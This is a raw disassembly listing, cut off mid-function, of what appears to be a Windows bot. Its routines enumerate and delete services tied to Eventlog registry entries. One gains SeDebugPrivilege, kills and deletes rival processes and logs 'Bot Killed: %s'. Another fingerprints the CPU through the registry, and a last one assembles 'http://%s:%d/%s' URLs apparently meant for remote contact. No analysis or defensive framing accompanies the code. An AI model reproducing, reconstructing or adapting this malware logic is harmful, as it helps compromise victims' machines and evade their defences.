mov [ebp+1B4h+var_208], ebx
loc_419B1B: ; CODE XREF: sub_419A9F+153�j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz loc_419BE2
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_419BCE
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_419A9F+13D�j
xor edi, edi
loc_419B5A: ; CODE XREF: sub_419A9F+10C�j
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_419B60: ; CODE XREF: sub_419A9F+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419B60
sub eax, edx
push eax
push [ebp+1B4h+var_224]
lea eax, [ebp+edi+1B4h+var_204]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419B99
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_416F32
add esp, 0Ch
loc_419B99: ; CODE XREF: sub_419A9F+DD�j
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_419BA0: ; CODE XREF: sub_419A9F+106�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419BA0
sub eax, edx
cmp edi, eax
jbe short loc_419B5A
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_419BCE: ; CODE XREF: sub_419A9F+B7�j
push [ebp+1B4h+var_210]
call ds:dword_41D020 ; RegEnumValueA
cmp eax, 103h
jnz loc_419B58
loc_419BE2: ; CODE XREF: sub_419A9F+98�j
push [ebp+1B4h+var_210]
call ds:dword_41D010 ; RegCloseKey
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_419B1B
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_419B18
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1B4h
leave
retn
sub_419A9F endp
; =============== S U B R O U T I N E =======================================
sub_419C1D proc near ; CODE XREF: sub_419C6D+189�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:dword_41D024 ; OpenSCManagerA
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:dword_41D044 ; OpenServiceA
mov edi, eax
mov ebx, edi
call sub_419760
push edi
call ds:dword_41D03C ; DeleteService
test eax, eax
jz short loc_419C69
mov bl, 1
loc_419C57: ; CODE XREF: sub_419C1D+4E�j
push esi
mov esi, ds:dword_41D040
call esi ; CloseServiceHandle
push edi
call esi ; CloseServiceHandle
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419C69: ; CODE XREF: sub_419C1D+36�j
xor bl, bl
jmp short loc_419C57
sub_419C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_419C6D proc near ; CODE XREF: sub_419E55+35�p
; sub_419E55:loc_419E92�p
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_233 = byte ptr -233h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi
push eax
mov [ebp+2C0h+var_234], 0
call sub_407B70
push esi
lea eax, [ebp+2C0h+var_133]
push edi
push eax
mov [ebp+2C0h+var_134], 0
call sub_407B70
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz loc_419E35
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:dword_41D018 ; RegEnumKeyA
cmp eax, 103h
jz loc_419E34
jmp short loc_419D2A
; ---------------------------------------------------------------------------
loc_419D25: ; CODE XREF: sub_419C6D+1C1�j
mov esi, 0FFh
loc_419D2A: ; CODE XREF: sub_419C6D+B6�j
push ebx
lea eax, [ebp+2C0h+var_334]
push edi
push eax
call sub_407B70
push ebx
lea eax, [ebp+2C0h+var_234]
push edi
push eax
call sub_407B70
lea eax, [ebp+2C0h+var_134]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_8 ; "%s\\%s"
lea eax, [ebp+2C0h+var_234]
push esi
push eax
call sub_402AEE
lea eax, [ebp+2C0h+var_234]
add esp, 2Ch
lea esi, [eax+1]
loc_419D6F: ; CODE XREF: sub_419C6D+107�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419D6F
sub eax, esi
mov [ebp+eax+2C0h+var_234], cl
lea eax, [ebp+2C0h+var_134]
push offset aLdm ; "LDM"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_419E12
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+var_134]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_419E10
push ebx
lea eax, [ebp+2C0h+var_334]
push eax
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+var_234]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_419E10
xor esi, esi
loc_419DCB: ; CODE XREF: sub_419C6D+1A1�j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_419DD1: ; CODE XREF: sub_419C6D+169�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419DD1
sub eax, edx
push eax
push [ebp+2C0h+var_340]
lea eax, [ebp+esi+2C0h+var_334]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419DFC
lea eax, [ebp+2C0h+var_134]
push eax
call sub_419C1D
pop ecx
loc_419DFC: ; CODE XREF: sub_419C6D+180�j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_419E03: ; CODE XREF: sub_419C6D+19B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419E03
sub eax, edx
cmp esi, eax
jbe short loc_419DCB
loc_419E10: ; CODE XREF: sub_419C6D+13B�j
; sub_419C6D+15A�j
xor edi, edi
loc_419E12: ; CODE XREF: sub_419C6D+127�j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:dword_41D018 ; RegEnumKeyA
cmp eax, 103h
jnz loc_419D25
loc_419E34: ; CODE XREF: sub_419C6D+B0�j
pop ebx
loc_419E35: ; CODE XREF: sub_419C6D+8A�j
push [ebp+2C0h+var_33C]
call ds:dword_41D010 ; RegCloseKey
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2C0h
leave
retn
sub_419C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E55 proc near ; CODE XREF: sub_419EA0+42A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D0F8 ; TerminateProcess
test eax, eax
jz short loc_419E9C
push 7D0h
call ds:dword_41D0FC ; Sleep
push [ebp+arg_4]
call ds:dword_41D0D0 ; DeleteFileA
test eax, eax
push [ebp+arg_8]
jz short loc_419E92
call sub_419A9F
push [ebp+arg_8]
call sub_419C6D
pop ecx
jmp short loc_419E97
; ---------------------------------------------------------------------------
loc_419E92: ; CODE XREF: sub_419E55+2B�j
call sub_419C6D
loc_419E97: ; CODE XREF: sub_419E55+3B�j
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419E9C: ; CODE XREF: sub_419E55+10�j
xor al, al
pop ebp
retn
sub_419E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA0 proc near ; DATA XREF: .text:0041BF57�o
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
var_420 = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_210 = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h
lea eax, [esp+57Ch+var_317]
push ebx
push eax
mov [esp+584h+var_318], bl
call sub_407B70
add esp, 0Ch
mov [esp+578h+var_558], offset aWinlogon_exe ; "winlogon.exe"
mov [esp+578h+var_554], offset aSvchost_exe ; "svchost.exe"
mov [esp+578h+var_550], offset aServices_exe ; "services.exe"
call sub_402AE8 ; GetCurrentProcessId
mov edi, ds:dword_41D0E4
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi ; GetModuleHandleA
mov esi, ds:dword_41D0EC
push eax
call esi ; GetProcAddress
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov dword_426580, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_3 ; "kernel32.dll"
mov dword_42658C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov dword_426574, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov dword_426578, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov dword_42657C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov dword_426568, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov dword_426584, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov dword_42656C, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dl_10 ; "kernel32.dll"
mov dword_426590, eax
call edi ; GetModuleHandleA
push eax
call esi ; GetProcAddress
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov dword_426570, eax
call ds:dword_41D0E8 ; LoadLibraryA
push eax
call esi ; GetProcAddress
cmp dword_426580, ebx
mov dword_426588, eax
jz loc_41A36B
cmp dword_42658C, ebx
jz loc_41A36B
cmp dword_426574, ebx
jz loc_41A36B
cmp dword_426578, ebx
jz loc_41A36B
cmp dword_42657C, ebx
jz loc_41A36B
cmp dword_426568, ebx
jz loc_41A36B
cmp dword_426584, ebx
jz loc_41A36B
cmp dword_42656C, ebx
jz loc_41A36B
cmp dword_426590, ebx
jz loc_41A36B
cmp dword_426570, ebx
jz loc_41A36B
cmp eax, ebx
jz loc_41A36B
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A087: ; CODE XREF: sub_419EA0+238�j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_9 ; "%s\\%s"
lea eax, [esp+esi+584h+var_210]
push 103h
push eax
call sub_402AEE
lea eax, [esp+esi+58Ch+var_210]
add esp, 14h
lea ecx, [eax+1]
loc_41A0B9: ; CODE XREF: sub_419EA0+21E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A0B9
add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+var_210], bl
jb short loc_41A087
loc_41A0DA: ; CODE XREF: sub_419EA0+4C6�j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call dword_426574
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call dword_426578
test eax, eax
jz loc_41A35B
jmp loc_41A344
; ---------------------------------------------------------------------------
loc_41A108: ; CODE XREF: sub_419EA0+4B5�j
mov edi, ds:dword_41D104
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi ; GetCurrentThread
mov esi, ds:dword_41D038
push eax
call esi ; OpenThreadToken
test eax, eax
jnz short loc_41A15C
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 3F0h
jnz short loc_41A158
push 2
call ds:dword_41D030 ; ImpersonateSelf
test eax, eax
jnz short loc_41A147
mov [esp+578h+var_569], bl
loc_41A147: ; CODE XREF: sub_419EA0+2A1�j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi ; GetCurrentThread
push eax
call esi ; OpenThreadToken
test eax, eax
jnz short loc_41A15C
loc_41A158: ; CODE XREF: sub_419EA0+295�j
mov [esp+578h+var_569], bl
loc_41A15C: ; CODE XREF: sub_419EA0+288�j
; sub_419EA0+2B6�j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
add esp, 0Ch
test al, al
jnz short loc_41A181
push [esp+578h+var_564]
call ds:dword_41D0DC ; CloseHandle
mov [esp+578h+var_569], bl
loc_41A181: ; CODE XREF: sub_419EA0+2D1�j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call dword_42658C
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A19D
mov [esp+578h+var_569], bl
loc_41A19D: ; CODE XREF: sub_419EA0+2F7�j
mov esi, 104h
push esi
lea eax, [esp+57Ch+var_420]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+57Ch+var_420]
push eax
push ebx
push [esp+584h+var_568]
call dword_426588
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+var_210]
loc_41A1D3: ; CODE XREF: sub_419EA0+352�j
lea eax, [esp+578h+var_420]
push eax
push edi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41A1F6
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41A1D3
jmp short loc_41A1FA
; ---------------------------------------------------------------------------
loc_41A1F6: ; CODE XREF: sub_419EA0+345�j
mov [esp+578h+var_569], bl
loc_41A1FA: ; CODE XREF: sub_419EA0+354�j
cmp [esp+578h+var_569], bl
jz loc_41A32A
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41A32A
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz loc_41A32A
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_426574
cmp eax, 0FFFFFFFFh
jz loc_41A32A
push eax
push esi
call sub_4199AC
cmp al, bl
pop ecx
pop ecx
jz loc_41A32A
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_419A10
test al, al
pop ecx
jz loc_41A30F
push [esp+578h+var_554]
call sub_402648
cmp eax, ebx
pop ecx
jnz short loc_41A293
push ebx
jmp short loc_41A309
; ---------------------------------------------------------------------------
loc_41A293: ; CODE XREF: sub_419EA0+3EE�j
push eax
push [esp+57Ch+var_554]
push [esp+580h+var_558]
push [esp+584h+var_568]
call sub_4198D2
add esp, 10h
cmp al, bl
jz short loc_41A30F
push 100h
call sub_402648
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+var_420]
push eax
push [esp+580h+var_568]
call sub_419E55
add esp, 0Ch
test al, al
jz short loc_41A308
push esi
call sub_402A45
pop ecx
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
lea eax, [esp+578h+var_420]
push eax
push offset aBotKilledS ; "Bot Killed: %s"
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 14h
xor ebx, ebx
loc_41A308: ; CODE XREF: sub_419EA0+434�j
push esi
loc_41A309: ; CODE XREF: sub_419EA0+3F1�j
call sub_402B9B
pop ecx
loc_41A30F: ; CODE XREF: sub_419EA0+3DC�j
; sub_419EA0+40A�j
mov esi, [esp+578h+var_540]
push ebx
push 4
call dword_426574
cmp eax, 0FFFFFFFFh
jz short loc_41A32A
push eax
push esi
call sub_419948
pop ecx
pop ecx
loc_41A32A: ; CODE XREF: sub_419EA0+35E�j
; sub_419EA0+386�j ...
push [esp+578h+var_564]
mov esi, ds:dword_41D0DC
call esi ; CloseHandle
push [esp+578h+var_568]
call esi ; CloseHandle
push 1
call ds:dword_41D0FC ; Sleep
loc_41A344: ; CODE XREF: sub_419EA0+263�j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call dword_42657C
test eax, eax
jnz loc_41A108
loc_41A35B: ; CODE XREF: sub_419EA0+25D�j
push 927C0h
call ds:dword_41D0FC ; Sleep
jmp loc_41A0DA
; ---------------------------------------------------------------------------
loc_41A36B: ; CODE XREF: sub_419EA0+14F�j
; sub_419EA0+15B�j ...
call ds:dword_41D0E0 ; GetCurrentThreadId
push eax
call sub_414042
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_419EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41A391 proc near ; CODE XREF: sub_401CC0+E0�p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi
push eax
call sub_407B70
push 4
push offset dword_426BE8
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax
push 4
call sub_416ECD
add esp, 20h
test al, al
jz loc_41A5A9
push ebx
lea eax, [ebp+2C4h+var_334]
push eax
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz loc_41A4E9
mov edi, 0FFh
push edi
lea eax, [ebp+2C4h+var_133]
push esi
push eax
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+var_134], 0
call sub_407B70
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_14 ; "%s"
lea eax, [ebp+2C4h+var_134]
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_134]
add esp, 1Ch
lea esi, [eax+1]
loc_41A45C: ; CODE XREF: sub_41A391+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A45C
sub eax, esi
push ebx
push 0
mov esi, offset byte_426AE8
push esi
mov [ebp+eax+2C4h+var_134], cl
call sub_407B70
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41A482: ; CODE XREF: sub_41A391+154�j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41A499
cmp [ebp+ecx+2C4h+var_134], 20h
jz short loc_41A4C9
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A391+F5�j
movsx eax, [ebp+ecx+2C4h+var_134]
push eax
push esi
push offset aSC_1 ; "%s%c"
push edi
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41A4B7: ; CODE XREF: sub_41A391+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4B7
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov byte_426AE8[eax], dl
loc_41A4C9: ; CODE XREF: sub_41A391+FF�j
; sub_41A391+106�j
lea eax, [ebp+2C4h+var_134]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41A4D9: ; CODE XREF: sub_41A391+14D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4D9
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41A482
jmp short loc_41A51C
; ---------------------------------------------------------------------------
loc_41A4E9: ; CODE XREF: sub_41A391+85�j
push ebx
push esi
mov esi, offset byte_426AE8
push esi
call sub_407B70
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi
push esi
call sub_402AEE
add esp, 18h
lea eax, [esi+1]
loc_41A50D: ; CODE XREF: sub_41A391+181�j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A50D
sub esi, eax
mov byte_426AE8[esi], cl
loc_41A51C: ; CODE XREF: sub_41A391+156�j
and dword_426BEC, 0
mov [ebp+2C4h+var_33C], 1
loc_41A52A: ; CODE XREF: sub_41A391+20D�j
inc dword_426BEC
push ebx
lea eax, [ebp+2C4h+var_234]
push 0
push eax
call sub_407B70
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41A560: ; CODE XREF: sub_41A391+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A560
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz short loc_41A5A0
push [ebp+2C4h+var_340]
call ds:dword_41D010 ; RegCloseKey
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41A52A
loc_41A5A0: ; CODE XREF: sub_41A391+1FB�j
push [ebp+2C4h+var_340]
call ds:dword_41D010 ; RegCloseKey
loc_41A5A9: ; CODE XREF: sub_41A391+62�j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 2C4h
leave
retn
sub_41A391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5C1 proc near ; CODE XREF: sub_41A8D5+B7�p
var_518 = dword ptr -518h
var_508 = dword ptr -508h
var_504 = byte ptr -504h
var_501 = byte ptr -501h
var_390 = byte ptr -390h
var_38D = byte ptr -38Dh
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_508], eax
mov eax, ds:dword_41EF64
mov [ebp+var_C], eax
mov eax, ds:dword_41EF68
mov esi, offset dword_41EF6C
lea edi, [ebp+var_504]
mov ebx, 16Fh
movsw
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_501]
push 0
push eax
movsb
call sub_407B70
mov esi, offset dword_41EF70
lea edi, [ebp+var_390]
movsw
movsb
push ebx
xor esi, esi
lea eax, [ebp+var_38D]
push esi
push eax
call sub_407B70
xor eax, eax
mov [ebp+var_1C], 0
lea edi, [ebp+var_1B]
stosd
stosd
stosd
stosw
stosb
mov edi, 0FFh
push edi
lea eax, [ebp+var_21B]
push esi
push eax
mov [ebp+var_21C], 0
call sub_407B70
push edi
lea eax, [ebp+var_11B]
push esi
push eax
mov [ebp+var_11C], 0
call sub_407B70
add esp, 30h
cmp [ebp+arg_4], 0
jz short loc_41A6F1
call sub_419347
test al, al
jnz short loc_41A6D9
push dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A6D0: ; CODE XREF: sub_41A5C1+114�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A6D0
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A6D9: ; CODE XREF: sub_41A5C1+BD�j
push 100h
lea esi, [ebp+var_11C]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41A752
; ---------------------------------------------------------------------------
loc_41A6F1: ; CODE XREF: sub_41A5C1+B4�j
push dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A741: ; CODE XREF: sub_41A5C1+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A741
loc_41A748: ; CODE XREF: sub_41A5C1+116�j
sub eax, edx
mov [ebp+eax+var_11C], 0
loc_41A752: ; CODE XREF: sub_41A5C1+12E�j
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_504]
push eax
call sub_41432A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_41A774
loc_41A76D: ; CODE XREF: sub_41A5C1+1EB�j
xor eax, eax
jmp loc_41A8C6
; ---------------------------------------------------------------------------
loc_41A774: ; CODE XREF: sub_41A5C1+1AA�j
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
lea ebx, [ebp+var_390]
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41A7AE
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz short loc_41A76D
loc_41A7AE: ; CODE XREF: sub_41A5C1+1D1�j
mov ebx, [ebp+var_508]
push 9
pop ecx
xor eax, eax
mov edi, ebx
stosd
push 0FFh
lea eax, [ebx+24h]
push 61h
mov esi, offset dword_4245DC
mov edi, ebx
push eax
rep movsd
call sub_407B70
mov esi, 101h
push esi
lea eax, [ebx+123h]
push 62h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+224h]
push esi
stosw
lea eax, [ebx+226h]
push 22h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+327h]
stosw
lea edi, [ebx+42Ah]
add esp, 24h
and [ebp+var_8], 0
mov [ebp+var_508], edi
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A827: ; CODE XREF: sub_41A5C1+29B�j
mov edi, [ebp+var_508]
loc_41A82D: ; CODE XREF: sub_41A5C1+264�j
